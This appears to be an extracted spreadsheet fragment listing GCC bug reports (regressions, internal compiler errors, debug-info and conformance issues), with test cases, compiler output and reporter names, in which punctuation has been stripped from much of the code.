    <t>GCC-61659</t>
  </si>
  <si>
    <t>[4.9 Regression] Extra undefined symbol because of devirtualization</t>
  </si>
  <si>
    <t>Given
struct generic_parser_base {
  virtual void getOption()
  void getExtraOptionNames() { getOption() }
}
template  struct parser : public generic_parser_base {
  virtual void getOption() {}
}
struct PassNameParser : public parser {
  PassNameParser()
}
struct list {
  PassNameParser Parser
  virtual void getExtraOptionNames() { return Parser.getExtraOptionNames() }
}
list PassList
gcc 4.9 and trunk will produce an undefined reference to _ZN6parserIiE9getOptionEv (parser::getOption()) which suggest that the template is not being instantiated when the call is devirtualized.
Using -fno-devirtualize avoids the bug.</t>
  </si>
  <si>
    <t>rafael</t>
  </si>
  <si>
    <t>GCC-56193</t>
  </si>
  <si>
    <t>ios_base should replace operator void* with explicit operator bool in C++11 onwards.</t>
  </si>
  <si>
    <t>As pointed out on SO g++ still compiles:
std::cout &lt;&lt; std::cout
In C++11 the stream testing operator was changed from:
  operator void*() const
to:
  explicit operator bool() const
A quick patch is being tested now.
The target is 4.9 even though it is simple.</t>
  </si>
  <si>
    <t>GCC-12793</t>
  </si>
  <si>
    <t>[3.3 Regression] Can't make static_cast from std::complex to std::complex in 3.3.1</t>
  </si>
  <si>
    <t>Hi
The following code doesn't compile with g++ 3.3.1 (it did compile with older g++ 
2.9.6):
#include 
#include 
using namespace std
int main(int argcchar *argv[])
{
  std::complex cfpvar(0.080.08)
  std::complex cdfpvar(1.111.11)
  cout &lt;&lt; cfpvar= &lt;&lt; cfpvar &lt;&lt; endl
  cout &lt;&lt; cdfpvar= &lt;&lt; cdfpvar &lt;&lt; endl
  cfpvar = static_cast &gt;(cdfpvar) // g++ 3.3.1 wont compile
  cout &lt;&lt; cdfpvar= &lt;&lt; cdfpvar &lt;&lt; endl
  exit(0)
}
g++ -v test.cc
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.3.1/specs
Configured with: ../configure --prefix=/usr --libdir=/usr/lib 
--with-slibdir=/lib --mandir=/usr/share/man --infodir=/usr/share/info 
--enable-shared --enable-threads=posix --disable-checking --enable-long-long 
--enable-__cxa_atexit --enable-languages=cc++adaf77objcjavapascal 
--host=i586-mandrake-linux-gnu --with-system-zlib
Thread model: posix
gcc version 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk)
 /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.3.1/cc1plus -quiet -v -D__GNUC__=3 
-D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=1 -D_GNU_SOURCE test.cc -D__GNUG__=3 
-quiet -dumpbase test.cc -auxbase test -version -o /tmp/ccKkUYld.s
GNU C++ version 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk) (i586-mandrake-linux-gnu)
        compiled by GNU C version 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64328
ignoring nonexistent directory /usr/i586-mandrake-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.3.1
 /usr/include/c++/3.3.1/i586-mandrake-linux-gnu
 /usr/include/c++/3.3.1/backward
 /usr/local/include
 /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.3.1/include
 /usr/include
End of search list.
test.cc: In function `int main(int char**)':
test.cc:11: error: invalid static_cast from type `std::complex' to type 
`std::complex'</t>
  </si>
  <si>
    <t>sarin</t>
  </si>
  <si>
    <t>GCC-67371</t>
  </si>
  <si>
    <t>Never executed throw in constexpr function fails to compile</t>
  </si>
  <si>
    <t>The following code fails to compile on GCC trunk:
    constexpr void f() {
        if (false)
            throw
    }
The error is:
    [snip]: In function 'constexpr void f()':
    [snip]: error: expression '' is not a constant-expression
     }
     ^
The code should compile because the throw expression is never executed inside a constexpr context. Clang indeed compiles this just fine.
Live example: http://melpon.org/wandbox/permlink/V0g96xpWdO2eWGNx</t>
  </si>
  <si>
    <t>GCC-19375</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Access violation diagnostic given twice</t>
  </si>
  <si>
    <t>I'm surprised I can't find this reported already apologies if it has been.
Given:
class A { int i }
class B : public A { int f() { return i } }
GCC 3.4 and up prints the same diagnostic twice:
access2.cc: In member function `int B::f()':
access2.cc:1: error: `int A::i' is private
access2.cc:3: error: within this context
access2.cc:1: error: `int A::i' is private
access2.cc:3: error: within this context
GCC 2.95 - 3.3 only printed the diagnostic once:</t>
  </si>
  <si>
    <t>GCC-51458</t>
  </si>
  <si>
    <t>[4.7 Regression] Accepts invalid designated initializers</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #51229 +++
int a = { .foo = 6 }
int b = { [0] = 1 }
_Complex float c = { .foo = 0  1 }
_Complex float d = { [0] = 0  1 }
_Complex float e = { 0 .foo = 1 }
_Complex float f = { 0 [0] = 1 }
char g[] = { [7] = abcd }
should have all initializers rejected but instead it ignores the designators and accepts it.  The C FE rejects all but the last one.</t>
  </si>
  <si>
    <t>GCC-14444</t>
  </si>
  <si>
    <t>no proper debugging information for local variable</t>
  </si>
  <si>
    <t>I have a small program for which g++ 3.2.1 doesn't seem to generate the right 
debugging information. Although this problem was seen in a vendor supplied 
cross compiler I confirmed that it exists in 3.x.y native compilers on RedHat 
and Solaris.
The magic combination to trigger this problems seems to be a string/int pair 
straddling a while/switch code block:
#include 
#include 
int main(int argc char *argv[]) {
    std::string a = foo
    int c = 0
    while (c != -1) {
	switch (c = getchar()) {
	    default:
		printf (read %d %s\n c a.c_str())
		c = -1 // break the loop
		break
	}
    }
    std::string b = bar
    int k = 10
    printf(%s %s %d\n a.c_str() b.c_str() k)
}
When I compile this with -g and default optimization and load it in gdb I 
can't see all the local variables via 'info locals'.
Here are my observations about the program:
- This is the exact combination that causes the problem if I delete one of the 
string variables switch the order of variable definitions or delete the 
while/switch blocks the problem goes away.
- To begin with only the variable 'k' is visible. Even inside the while loop 
I can't see 'c' or 'a'.
- All variables become visible once I exit the while loop.
- It doesn't matter if I actually use the variables or not - they are invisible 
until I exit the while loop.
- If I switch to g++ 2.95.3 all is well. Problem begins with g++ 3.2.1.
(Cross) Compiler is:
/opt/hardhat3.0/hardhat/devkit/x86/586/bin/586-g++ -v
Reading specs from /opt/hardhat3.0/hardhat/devkit/x86/586/bin/../lib/gcc-
lib/i586-hardhat-linux/3.2.1/specs
Configured with: ../configure --host=i686-pc-linux-gnu
--target=i586-hardhat-linux --prefix=/opt/hardhat/devkit/x86/586
--exec-prefix=/opt/hardhat/devkit/x86/586
--bindir=/opt/hardhat/devkit/x86/586/bin
--sbindir=/opt/hardhat/devkit/x86/586/sbin
--sysconfdir=/opt/hardhat/devkit/x86/586/etc
--datadir=/opt/hardhat/devkit/x86/586/share
--includedir=/opt/hardhat/devkit/x86/586/include
--libdir=/opt/hardhat/devkit/x86/586/lib
--libexecdir=/opt/hardhat/devkit/x86/586/libexec
--localstatedir=/opt/hardhat/devkit/x86/586/var
--sharedstatedir=/opt/hardhat/devkit/x86/586/share
--mandir=/opt/hardhat/devkit/x86/586/man
--infodir=/opt/hardhat/devkit/x86/586/info
--program-transform-name=s^586- --enable-cross
--with-gxx-include-dir=${prefix}/i586-hardhat-linux/include/g++-v3
--enable-shared --enable-languages=cc++ --enable-threads=posix
--enable-__cxa_atexit --disable-multilib --with-cpu=i586
Thread model: posix
gcc version 3.2.1 20020930 (MontaVista)
Debugger is:
swtest38:~-15&gt; gdb --version
GNU gdb 5.2.1
Copyright 2002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586-hardhat-linux.
Target system is:
swtest38:~-18&gt; uname -a
Linux swtest38 2.4.18 #1 Wed Feb 11 00:31:23 CST 2004 i586 unknown
Sorry for not including the preprocessed output I thought that
since string and stdio.h are standard header files a source file is
sufficient.
Jim Wilson has already taken a look at this problem and offered the following 
diagnosis:
The locals are there but they have been put into a lexical block which  is 
not correct.  The current development sources seem to handle this  correctly.  
a b and c are visible in the entire function except the prologue/epilogue 
and k is visible only after the loop.
info locals still didn't work for me though.  It fails to print the value of a 
and then bails out.
This is for an x86-linux target that uses dwarf2 debug info.  I didn't check a 
stabs target like solaris.
-- 
Jim Wilson GNU Tools Support http://www.SpecifixInc.com
Thanks for your time and help.
Sriram</t>
  </si>
  <si>
    <t>mailsb04-posts</t>
  </si>
  <si>
    <t>GCC-225</t>
  </si>
  <si>
    <t>using declaration doesn't take into account member overloading</t>
  </si>
  <si>
    <t>While performing a using declaration in a derived class for method names in a base class g++ doesn't seem to be able to pull in the member function of a base class if the function with the same name but different args exists in the derived class.
When compiling the attached file g++ reports the following error:
gcc-using-bug.cpp:19: cannot adjust access to `int Foo::Baz(const char *) const' in `class Bar'
gcc-using-bug.cpp:17:   because of local method `int Bar::Baz(char int)' with same name
The code in the attached file seems to be correct according to the ISO C++ standard (section 7.3.3 item 14)- but then I may be misinterpreting the standard (?)
Release:
2.96 (snapshot 20000410)
Environment:
System: Linux buick 2.2.14-15mdksmp #1 SMP Tue Jan 4 21:36:33 CET 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
How-To-Repeat:
g++ -c gcc-using-bug.cpp</t>
  </si>
  <si>
    <t>matt_conway</t>
  </si>
  <si>
    <t>GCC-46414</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.target/i386/recip-vec-sqrtf-avx.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 166517:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg00405.html
caused:
FAIL: gcc.target/i386/recip-vec-sqrtf-avx.c scan-assembler-times vrsqrtps[ \\t]+[^\n]*%ymm 4</t>
  </si>
  <si>
    <t>GCC-46724</t>
  </si>
  <si>
    <t>[4.6 Regression] Wrong debug info: Invalid variable location</t>
  </si>
  <si>
    <t>The guality/nrv-1.c testcase currently fails on s390x when compiled with -O2:
Breakpoint 1 f () at /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:20
20        a2.i[4] = 7  /* { dg-final { gdb-test 20 a2.i\[0\] 42 } } */
Missing separate debuginfos use: debuginfo-install glibc-2.12.1-2.s390x
(gdb) p a2.i[0]
$1 = -336596880
The memory location of 'a2' is given as being based on r1:
readelf --debug-dump=info
...
 : Abbrev Number: 9 (DW_TAG_variable)
       DW_AT_name        : a2
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 16
       DW_AT_type        : 
       DW_AT_location    : 2 byte block: 71 0       (DW_OP_breg1: 0)
...
But in fact r1 is not used at all. Instead the location is in r2:
f:
.LFB0:
        .file 1 /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c
        .loc 1 15 0
        .cfi_startproc
        .loc 1 17 0
        lhi     %r342
        st      %r30(%r2)    &lt;-- a2.i[0] = 42
        ...
a2 is returned by f. The address of the location where the return value should reside is passed to f as implicit first parameter in r2.
Right before cprop_hardreg the code looks like this. r2 is copied into r1 and r1 is used to reference a2. DECL_RTL () is (mem/s:SI (reg/f:DI 1 %r1 [orig:45 D.1986 ] [45]).
nrv-1.c.201r.ce3:
(insn 2 8 47 2 (set (reg/f:DI 1 %r1 [orig:45 D.1986 ] [45])
        (reg:DI 2 %r2 [ D.1986 ])) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:15 62 {*movdi_64}
     (nil))
(insn 47 2 6 2 (set (reg:SI 3 %r3)
        (const_int 42 [0x2a])) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:17 66 {*movsi_zarch}
     (nil))
(insn 6 47 45 2 (set (mem/s:SI (reg/f:DI 1 %r1 [orig:45 D.1986 ] [45]) [2 .i+0 S4 A32])
        (reg:SI 3 %r3)) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:17 66 {*movsi_zarch}
     (expr_list:REG_DEAD (reg:SI 3 %r3)
        (nil)))
Then r1 is propagated into insn 6 and insn 2 is removed in DCE while DECL_RTL () still references r1.
nrv-1.c.203r.cprop_hardreg:
(insn 2 8 47 2 (set (reg/f:DI 1 %r1 [orig:45 D.1986 ] [45])
        (reg:DI 2 %r2 [ D.1986 ])) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:15 62 {*movdi_64}
     (nil))
(insn 47 2 6 2 (set (reg:SI 3 %r3)
        (const_int 42 [0x2a])) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:17 66 {*movsi_zarch}
     (nil))
(insn 6 47 45 2 (set (mem/s:SI (reg/f:DI 2 %r2 [orig:45 D.1986 ] [45]) [2 .i+0 S4 A32])
        (reg:SI 3 %r3)) /build3/gcc-head/gcc/testsuite/gcc.dg/guality/nrv-1.c:17 66 {*movsi_zarch}
     (expr_list:REG_DEAD (reg:SI 3 %r3)
        (nil)))
When generating the debug info for a2 add_location_or_const_value_attribute first tries to find an RTX for a2 directly by invoking rtl_for_decl_location p on the VAR_DECL of a2 what returns NULL. It then invokes loc_list_from_tree which uses the DECL_VALUE_EXPR of the a2 decl - this is . rtl_for_decl_location then returns (mem/s:SI (reg/f:DI 1 %r1 [orig:45 D.1986 ] [45]) for .</t>
  </si>
  <si>
    <t>GCC-69560</t>
  </si>
  <si>
    <t>x86_64: alignof(uint64_t) produces incorrect results with -m32</t>
  </si>
  <si>
    <t>Sample Program (test.cpp):
#######################################################################
#include 
#include 
#include 
using namespace std
typedef struct {
        int32_t i32
        int64_t i64
} DefaultStruct
typedef struct {
        int32_t i32
        int64_t i64 __attribute__((aligned(8)))
} AlignedStruct
int main(void)
{
        DefaultStruct s
        printf( DefaultStruct: offset=%d struct align=%d member align=%d type align=%d\n 
                offsetof(DefaultStructi64) alignof(s) alignof(s.i64) alignof(int64_t) )
        AlignedStruct s2
        printf( AlignedStruct: offset=%d struct align=%d member align=%d type align=%d\n
                offsetof(AlignedStructi64) alignof(s2) alignof(s2.i64) alignof(int64_t) )
        return 0
}
#####################################################
Compile command line:
g++ -m32 --std=c++14 test.cpp -o test
#####################################################
Expected program output:
DefaultStruct: offset=4 struct align=4 member align=4 type align=4
AlignedStruct: offset=8 struct align=8 member align=8 type align=8
#####################################################
Actual program output:
DefaultStruct: offset=4 struct align=4 member align=4 type align=8
AlignedStruct: offset=8 struct align=8 member align=8 type align=8
#####################################################
Comments:
Note that the difference is alignof(uint64_t) returns 8 while the correct value appears to be 4.
I checked the ISO C++ spec section 3.11 and it says The alignment requirement of a complete type can be queried using an alignof expression so if alignof(int64_t) yields 8 then it shouldn't be legal to place an int64_t at offset 4 in a structure.
Disclaimer:  I checked the draft specification.  I don't have $212 lying around to purchase the final spec.
This is a possible duplicate with 61053 or 61447 however 61053 doesn't deal with the output of alignof() and 61447 has been suspended because the standards were ambiguous.  Here they seem more clear-cut.</t>
  </si>
  <si>
    <t>david.merillat</t>
  </si>
  <si>
    <t>GCC-33648</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in verify_flow_info for -fmodulo-sched -freorder-blocks-and-partition</t>
  </si>
  <si>
    <t>Most benchmarks in SPEC CPU2000 fail to compile with an ICE when compiled with -O2 -fmodulo-sched -freorder-blocks-and-partition for powerpc* and s390* targets.  Compiling the following minimized testcase:
unsigned res
void
foo (unsigned code int len)
{
  int i
  for (i = 0 i &lt; len i++)
      res |= code 
}
gives the output:
bug.c: In function â€˜fooâ€™:
bug.c:8: error: fallthru edge crosses section boundary (bb 9)
bug.c:8: error: fallthru edge crosses section boundary (bb 7)
bug.c:8: error: fallthru edge crosses section boundary (bb 13)
bug.c:8: error: fallthru edge crosses section boundary (bb 12)
bug.c:8: error: fallthru edge crosses section boundary (bb 3)
bug.c:8: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The failure starts with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=127293
    r127293 | revitale | 2007-08-08 12:21:37 +0000 (Wed 08 Aug 2007)</t>
  </si>
  <si>
    <t>GCC-17176</t>
  </si>
  <si>
    <t>internal compiler error on invalid inline assembler code</t>
  </si>
  <si>
    <t>i was trying to get a stack dump from a linux program and used some assembler to
do the trick. when compiling the following code
#include 
main() {
        char *stackptr
        __asm__(movl %esp%%eax : =eax(stackptr) : : eax)
        return 0
}
with gcc stack_crash.c causes the output
dec@dec:~$ gcc stack_crash.c
stack_crash.c: In function `main':
stack_crash.c:20: Internal compiler error in instantiate_virtual_regs_1 at
function.c:3971
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
this is gcc version 3.2.3 or more complete the output of gcc -v:
dec@dec:~$ gcc -v
Reading specs from /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/specs
Configured with: ../gcc-3.2.3/configure --prefix=/usr --enable-shared
--enable-threads=posix --enable-__cxa_atexit --disable-checking --with-gnu-ld
--verbose --target=i486-slackware-linux --host=i486-slackware-linux
Thread model: posix
gcc version 3.2.3
to fix the problem i upgraded my gcc version to 3.3.3 and now i get the
following output.
stack_crash.c: In function `main':
stack_crash.c:5: error: impossible constraint in `asm'
with gcc -v being
Reading specs from /usr/lib/gcc-lib/i486-pc-linux-gnu/3.3.3/specs
Configured with: /var/tmp/portage/gcc-3.3.3-r6/work/gcc-3.3.3/configure
--prefix=/usr --bindir=/usr/i486-pc-linux-gnu/gcc-bin/3.3
--includedir=/usr/lib/gcc-lib/i486-pc-linux-gnu/3.3.3/include
--datadir=/usr/share/gcc-data/i486-pc-linux-gnu/3.3
--mandir=/usr/share/gcc-data/i486-pc-linux-gnu/3.3/man
--infodir=/usr/share/gcc-data/i486-pc-linux-gnu/3.3/info --enable-shared
--host=i486-pc-linux-gnu --target=i486-pc-linux-gnu --with-system-zlib
--enable-languages=cc++ --enable-threads=posix --enable-long-long
--disable-checking --disable-libunwind-exceptions --enable-cstdio=stdio
--enable-version-specific-runtime-libs
--with-gxx-include-dir=/usr/lib/gcc-lib/i486-pc-linux-gnu/3.3.3/include/g++-v3
--with-local-prefix=/usr/local --enable-shared --enable-nls
--without-included-gettext --disable-multilib --enable-__cxa_atexit
--enable-clocale=generic
Thread model: posix
gcc version 3.3.3 20040412 (Gentoo Linux 3.3.3-r6 ssp-3.3.2-2 pie-8.7.6)
so actually this bug is already fixed. but i just felt like submitting it.
by the way the correct asm code turned out to be
        unsigned char *stackptr = (unsigned char *)
        asm (movl %%esp %0\n :=r(stackptr))
which works with both versions of gcc.
the bug was present on various linux systems with different distributions
processors and such.</t>
  </si>
  <si>
    <t>m.a.termeer</t>
  </si>
  <si>
    <t>GCC-18966</t>
  </si>
  <si>
    <t>cshift etc. not implemented for kind=1 and kind=2 actual arguments</t>
  </si>
  <si>
    <t>$ cat cshift-i12.f90
program main
  integer dimension(2) :: n=(/ 1 2 /)
  print *cshift(n1_1)
  print *cshift(n1_2)
end program main
$ gfortran cshift-i12.f90
/tmp/cc0eL77r.o(.text+0xaf): In function `MAIN__':
: undefined reference to `_gfortran_cshift0_1'
/tmp/cc0eL77r.o(.text+0x19b): In function `MAIN__':
: undefined reference to `_gfortran_cshift0_2'
collect2: ld returned 1 exit status
$ gfortran -v
Reading specs from /home/ig25/lib/gcc/i686-pc-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --prefix=/home/ig25 --enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20041213 (experimental)</t>
  </si>
  <si>
    <t>GCC-57899</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] bind/function with data member: infinite recursion</t>
  </si>
  <si>
    <t>The following program fails to compile with gcc-4.8.1 in C++11 mode: 
#include  
#include  
#include 
#include 
#include 
#include 
using namespace std
using namespace std::placeholders
int main()
{
    map table = {{0123456789012345 0}} 
    //list&gt; table = {{0123456789012345 0}} 
    function&amp;)&gt; get_first = 
        bind(
    auto it = find_if(table.begin() table.end()
                      bind(greater()
                           bind(&amp;string::length bind(get_first _1))
                           5))
    assert(it != table.end())
    return 0
}
Here is the result of compiling:
--------------------------------------------------------------
prospero% g++ -v -save-temps -std=c++11 -Wall -g -I../include -ftemplate-depth=10000 a.cpp 2&gt;&amp;1 
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/jpr/LOCAL/test/gcc-4.8.1/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/user/jpr/home/LOCAL/test/gcc-4.8.1 --with-local-prefix=/user/jpr/home/LOCAL/test/gcc-4.8.1 --enable-threads --enable-languages=adacc++fortranobjcobj-c++gojava --with-gmp-lib=/usr/lib64 --with-mpfr-lib=/usr/lib64 --with-mpc-lib=/usr/lib64
Thread model: posix
gcc version 4.8.1 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-Wall' '-g' '-I' '../include' '-ftemplate-depth=10000' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -E -quiet -v -I ../include -iprefix /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/ -D_GNU_SOURCE a.cpp -mtune=generic -march=x86-64 -std=c++11 -Wall -ftemplate-depth=10000 -g -fworking-directory -fpch-preprocess -o a.ii
ignoring nonexistent directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../x86_64-unknown-linux-gnu/include
ignoring duplicate directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1
ignoring duplicate directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/x86_64-unknown-linux-gnu
ignoring duplicate directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/backward
ignoring duplicate directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include
ignoring duplicate directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include-fixed
ignoring nonexistent directory /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/../../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ../include
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/x86_64-unknown-linux-gnu
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/backward
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include-fixed
 /user/jpr/home/LOCAL/test/gcc-4.8.1/include
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-Wall' '-g' '-I' '../include' '-ftemplate-depth=10000' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /home/jpr/LOCAL/test/gcc-4.8.1/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -fpreprocessed a.ii -quiet -dumpbase a.cpp -mtune=generic -march=x86-64 -auxbase a -g -Wall -std=c++11 -version -ftemplate-depth=10000 -o a.s
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: f1ad4865ded0b3f0e4317ac2d8456db9
In file included from /home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/bits/stl_algo.h:66:0
                 from /home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/algorithm:62
                 from a.cpp:5:
/home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/functional:1138:35: error: template instantiation depth exceeds maximum of 10000 (use -ftemplate-depth= to increase the maximum) substituting â€˜template typename std::add_rvalue_reference &gt;::type std::declval() [with _Tp = std::pair int&gt;&amp;]â€™
  -&gt; decltype(__arg(declval()...))
                                   ^
/home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/functional:1391:40:   recursively required by substitution of â€˜template decltype (__arg((declval)()...)) std::_Mu::operator()(_CVArg _Args = {_Args ...} _Arg = std::_Bind(const std::pair int&gt; _Args = {std::pair std::allocator &gt; int&gt;&amp;}]â€™
/home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/functional:1391:40:   required by substitution of â€˜template decltype (__arg((declval)()...)) std::_Mu::__call(_CVArg _Args = {_Args ...} long unsigned int ..._Indexes = {_Indexes ...} _Arg = std::_Bind::*)()const&gt;(std::_Bind(const std::pair int&gt; _Args = {std::pair std::allocator &gt; int&gt; long unsigned int ..._Indexes = {0ul}]â€™
/home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/functional:1143:50:   template instantiation depth exceeds maximum of 10000 (use -ftemplate-depth= to increase the maximum) substituting â€˜template typename std::add_rvalue_reference &gt;::type std::declval() [with _Tp = std::pair int&gt;&amp;]â€™
/home/jpr/LOCAL/test/gcc-4.8.1/include/c++/4.8.1/functional:1391:40:   recursively required by substitution of â€˜template decltype (__arg((declval)()...)) std::_Mu::operator()(_CVArg _Args = {_Args ...} _Arg = std::_Bind(const std::pair int&gt; _Args = {std::pair std::allocator &gt; int&gt;&amp;}]â€™
... FOLLOWED BY A LOT OF SIMILAR MESSAGES...
--------------------------------------------------------------
Note that
- I increased the -ftemplate-depth parameter to 10000 indeed it seems to be an infinite loop
- replacing the map by a list (commented line) does not change anything the error messages are similar
- compilation also fails with the same messages on MacOS 1.8.4 with g++-4.8.1 (MacPorts gcc48 4.8-20130404_1)
- The same program compiles (and works) correctly with g++-4.7.2 '4.7.2 20120921 (Red Hat 4.7.2-2)).
Regards
Jean-Paul Rigault</t>
  </si>
  <si>
    <t>jprigault</t>
  </si>
  <si>
    <t>GCC-34538</t>
  </si>
  <si>
    <t>[DR 697] combination of sstream invalid_argument and -std=c++0x breaks valid code</t>
  </si>
  <si>
    <t>#include 
#include 
int func()
{
        std::string s
        throw std::invalid_argument( s )
}
g++-4.3.0 -std=c++0x test.cpp
test.cpp: In function 'int func()':
test.cpp:7: error: 'invalid_argument' cannot be used as a function
this code compiles only if -std=c++0x is not given. If you just include  instead of  it also works with -std=c++0x so it seems to be related to the declarations in sstream but i couldn't manage to dig deeper. I tried to reduce the preprocessed source using delta/topformflat but it kicked out the declaration of invalid_argument giving me the same error.
Strangely using a smililar type like domain_error or out_of_range (they have the same base-class and their only definition is the constructor) works too.
gcc version 4.3.0 20071213 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-1735</t>
  </si>
  <si>
    <t>g++ crash in expand_inline_function with optimization</t>
  </si>
  <si>
    <t>g++ crashes on the following code when -O3 is used.
Release:
2.97 20010122 (experimental)
Environment:
System: Linux karma 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix
How-To-Repeat:
----------------------------------------
template 
struct A
{
  A ()
}
template 
A::A ()
{
}
template 
struct B
{
  A begin ()
}
template 
A
B::begin ()
{
  return A ()
}
void func ()
{
  A iter
}
template class B
template class A
----------------------------------------
$ ./cc1plus -O3 x2.cc
 A::A() A B::begin() void func() void func() A::A() [with T = int] A::A() [with T = int] A::A() [with T = int] A::A() [with T = int] A::A() [with T = int] A B::begin() [with T = int] A B::begin() [with T = int]
x2.cc:33:   instantiated from here
x2.cc:24: Internal error: Segmentation fault.
Please submit a full bug report.
 See  for instructions.
Here's where it's crashing:
Program received signal SIGSEGV Segmentation fault.
0x822f8d9 in expand_inline_function (fndecl=0x4019d478 parms=0x401a21e0 
    target=0x0 ignore=1 type=0x4019a7b8 structure_value_addr=0x0)
    at ../../egcs/gcc/integrate.c:963
963       else if (GET_CODE (loc) == MEM)
(gdb) where
#0  0x822f8d9 in expand_inline_function (fndecl=0x4019d478 parms=0x401a21e0 
    target=0x0 ignore=1 type=0x4019a7b8 structure_value_addr=0x0)
    at ../../egcs/gcc/integrate.c:963
#1  0x81bbf00 in try_to_integrate (fndecl=0x4019d478 actparms=0x401a21e0 
    target=0x0 ignore=1 type=0x4019a7b8 structure_value_addr=0x0)
    at ../../egcs/gcc/calls.c:1809
#2  0x81bc5d0 in expand_call (exp=0x4019ea40 target=0x0 ignore=1)
    at ../../egcs/gcc/calls.c:2291
#3  0x81aab95 in expand_expr (exp=0x4019ea40 target=0x0 tmode=VOIDmode 
    modifier=EXPAND_NORMAL) at ../../egcs/gcc/expr.c:7259
#4  0x81a1fe9 in store_expr (exp=0x4019ea60 target=0x401a10c0 want_value=0)
